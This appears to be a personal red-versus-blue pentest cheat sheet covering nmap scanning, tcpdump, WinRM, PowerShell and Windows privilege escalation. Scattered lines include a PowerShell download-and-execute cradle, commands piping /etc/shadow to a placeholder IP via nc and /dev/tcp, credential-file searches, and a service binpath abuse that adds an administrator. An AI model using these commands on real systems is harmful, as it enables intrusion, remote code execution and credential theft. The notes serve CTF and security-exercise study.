Post

RvB

Posted Updated
By madStacks 5 min read

Methodology

  1. Recon
  2. Initial Access
  3. Privilege Escalation
  4. Pivoting
  5. Execution

Scripts

Tools

Practice

Links

Topics

Frameworks

Scanners

Shells

Metasploit

Powershell

Enter-PSSession

  • Remote computer must be configured for remote management/cannot be a public network
    • Enable-PSRemoting -Force

Nmap

  • xsltproc to convert XML to HTML

Scanning plan

  1. ping all hosts
    • nmap -T4 -sn -oA ping_hosts_scan -iL targets.txt
  2. syn scan of all hosts
    • nmap -T5 -F -sS -Pn -n -oA syn_hosts_scan -iL targets.txt
  3. take individual IPs, do an intense scan, place results in doc (1 line from nmap result file)
    • sudo nmap -T4 -v -p- -sV --version-all -sC -O -Pn -n -oA intense_scan_$TARGET $TARGET
    • sudo nmap -T4 -v -p- -A -O -Pn -n -oA intense_scan_$TARGET $TARGET

Network scan

1
2
3
4
5

nmap -T5 -F -sS [range] -oA [filename]
nmap -T5 -F -sS -Pn -n -oA quick_scan -iL targets.txt
nmap -T5 -sn -oA quick_ping_scan -iL targets.txt
nmap -F -sS -Pn -n -f --mtu 32 --ttl 64 -e eth0 -oA slow_scan -iL targets.txt
nmap -sn -oA slow_ping_scan -iL targets.txt

Specific host

1
2
3
4
5
6
7

nmap -T5 -F -sS -O -Pn -n [IP] -oN [filename]
nmap -T5 -F -sV -O -Pn -n [IP] -oA [filename]
nmap -T5 -A -Pn -n [IP] -oA [filename]
nmap -T5 -p- -sV -O -Pn -n [IP] -oN [filename]
nmap -T5 -p[open ports] -sC -Pn -n [IP] -oN [filename]
nmap -T5 -p- -sV --version-all -sC -O -Pn -n -oN all_ports_$TARGET $TARGET
nmap -f --mtu 32 --ttl 64 -e eth0 -p- -sV --version-all -sC -O -Pn -n -oN all_ports_$TARGET $TARGET

Other helpful flags

1
2
3
4
5
6
7
8
9

--reason
--open
-v
--script=
* nbstat.nse [IP]
* smb-enum-users.nse [IP] -p 139 
* http-robots.txt.nse [IP] -p 80
-f --mtu 32 -D 192.168.1.1,192.168.1.2,10.10.10.10,143.158.56.2 --ttl 64 -e [interface]
--version-all (with -sV)

nmapAutomator

  • Works best for single host

IVRE

  • Works best for networks

Powershell scans

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16

(for /L %a IN (1,1,254) DO ping /n 1 /w 3 192.168.0.%a) | find "Reply" > C:\path\file

$port = 0
$network = "192.168.0.0"
$range = 1..254
$ErrorActionPreference= 'silentlycontinue'
$(Foreach ($add in $range)
{ $ip = "{0}.{1}" –F $network,$add
Write-Progress "Scanning Network" $ip -PercentComplete (($add/$range.Count)*100)
If(Test-Connection –BufferSize 32 –Count 1 –quiet –ComputerName $ip)
{ $socket = new-object System.Net.Sockets.TcpClient($ip, $port)
If($socket.Connected) { "$ip port $port open"
$socket.Close() }
else { "$ip port $port not open" }
}
}) | Out-File C:\path\file.csv

Recon-ng

1
2
3
4
5
6
7
8
9
10

recon-ng --no-check
--help
--show modules
--search
--use [module ex. recon/netblocks-hosts/reverse_resolve] then --show info (get info on that module) or --show options
--add netblocks [ip ex. 10.10.10.0/24]
--run (execute the attack)
--show hosts
--back (gets out of module)
find antivirus with discovery/info_disclosure/cache_snoop have to --set NAMESERVER [ip]

WinRM

From Linux

sudo pip install pywinrm

1
2
3
4
5
6
7
8

import winrm
s = winrm.Session(SERVER, auth=(USER, PASS))
r = s.run_cmd('whoami')
# r = s.run_cmd('ipconfig', ['all'])
# r = s.run_ps('gci')
print(r.status_code)
print(r.std_out)
print(r.std_err)

From Windows

Privilege Escalation

Nix

SCP

  • Copy the file “foobar.txt” from a remote host to the local host
    • $ scp your_username@remotehost.edu:foobar.txt /some/local/directory
  • Copy the file “foobar.txt” from the local host to a remote host
    • $ scp foobar.txt your_username@remotehost.edu:/some/remote/directory

FTP

1
2
3
4

get [file]
mget [*files]
put [file]
mput [*files]

iptables

  • Block strings with destination port 2018
    • iptables -A INPUT -m string --algo bm --string "test" -dport 2018 -j DROP

Logging

tcpdump

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23

--examples
tcpdump -i any (easiest)
tcpdump host [ip]
tcpdump src [ip] 
tcpdump dst [ip]
tcpdump net [ip]/24
tcpdump port [port] 
tcpdump src port [port] 
--general form
tcpdump -nn(X) [tcp/udp] and [dst/src/host] [ip] and port [port]
tcpdump -nn(X) host 10.10.75.6 and net 10.10.10
set snaplength to 0 (-s0 in tcpdump)
https://danielmiessler.com/study/tcpdump/#basic-communication

Example:
tcpdump -i <interface> -nn -s0 -G 600 -w %H%M_[service]_log.pcap port <num> -v
-interface is usually eth0, identify with ifconfig, test to make sure you have the right one
-s is actually size of packets to capture, 0 means inf
-w file to output, make it a .pcap and name it based on time created
-G 600 rotate file every 10 minutes
-nn don't convert addresses to names or resolve ports
-port [num] so it only captures traffic for the correct service
-v verbosity, can be there or not, also -vv exists

Powershell

1

powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('http://whatever')"

1
2
3
4
5
6
7

Enable-PsRemoting -Force
$credential = Get-Credential -Credential { ex. (nwtraders\administrator) }
Invoke-Command -computername [COMPUTER} -ScriptBlock { COMMAND } - Credential $credential
Copy-Item -Source \\server\share\file -Destination C:\path\
$wc = New-Object System.Net.WebClient
$wc.DownloadFile("http://whatever","C:\path\file")
Invoke-WebRequest -Uri "http://whatever" -OutFile "C:\path\file"

Tunelling

  • netsh interface portproxy add v4tov4 listenport=[LPORT] listenaddress=0.0.0.0 connectport=[RPORT] conneectaddress=[RHOST]
  • ssh [user]@[hop] -L[127.0.0.1]:[LPORT]:[RHOST]:[RPORT]

Misc

  • Shell upgrade: python -c "import pty;pty.spawn('/bin/sh');"
  • vi escape: :!bash

To Sort

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40

https://github.com/21y4d/nmapAutomator
https://github.com/sethsec/celerystalk

symbolic links in linux
/proc/self/environ

Networking
- `cat /etc/shadow > nc [] []`
- `cat /etc/shadow > /dev/tcp/[IP]/[port]`



linux watch command

creds in files
	dir /b /s web.config
	dir /b /s unattend.xml
	dir /b /s sysprep.inf
	dir /b /s sysprep.xml
	dir /b /s *pass*
	
post/windows/gather/enum_patches

exploit/windows/local/
	ppr_flatten_rec
	always_install_elevated

at windows prompt
	accesschk.exe -qwcu "Authenticated Users" *
	accesschk.exe -qwcu "Users" *
	accesschk.exe -qwcu "Everyone" *
	
	sc config [weak service].exe binpath="net user person pass /add"
	sc start [weak service].exe
	sc config [weak service].exe binpath="net localgroup administrators person /add"
	sc start [weak service].exe
	
	accesschk.exe -qwsu "Authenticated Users" C:\
	accesschk.exe -qwsu "Users" C:\
	accesschk.exe -qwsu "Everyone" C:\
CTF
attack rvb pentest defense
This post is licensed under CC BY 4.0 by the author.